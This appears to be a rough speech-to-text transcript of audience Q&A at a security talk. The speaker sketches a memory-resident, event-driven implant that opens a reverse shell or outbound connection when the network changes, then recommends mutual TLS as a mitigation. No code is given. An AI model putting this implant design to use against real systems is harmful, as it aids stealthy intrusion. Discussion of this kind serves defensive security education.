you'd want something that doesn't necessarily touch disk so a better way to do it do this would actually be to have something that lives completely in memory and is maybe it's more event-driven so it listens for like a network change so it just is someone logging or am i back on the network and then it would shoot the the reverse shell which doesn't have to be reversed shell back to the first interface I mean you could actually just do an outbound connection it's something else you could just have it autonomously start doing enough situational awareness move see I'm trying to figure out there a lot of different ways of doing it but that's just like an easy straightforward way to

just kind of explain it so that's kind of why did it that way anything else sure

if you have if you have certificates on both ends that that mitigates this issue that's the aptl s so that that's how you the problem is that like people you know organizations they they often tend to balk at the idea of rolling outside like that unfortunately but yeah that's that's I think what I'm trying to push for is using that more I've seen it twice this past year which is not great but actually the first time I saw it I was this here I was thrilled actually went up and shook the guy's hand because I was like it's like someone's actually doing this Wow but then again remember I work primarily with clients like in the finance sector

like in the North East corridor area so it this may be different for like if you're working like in medical or DoD you might seem different statistics so yeah that's just my own personal experiences with that anyone else No all right well thank you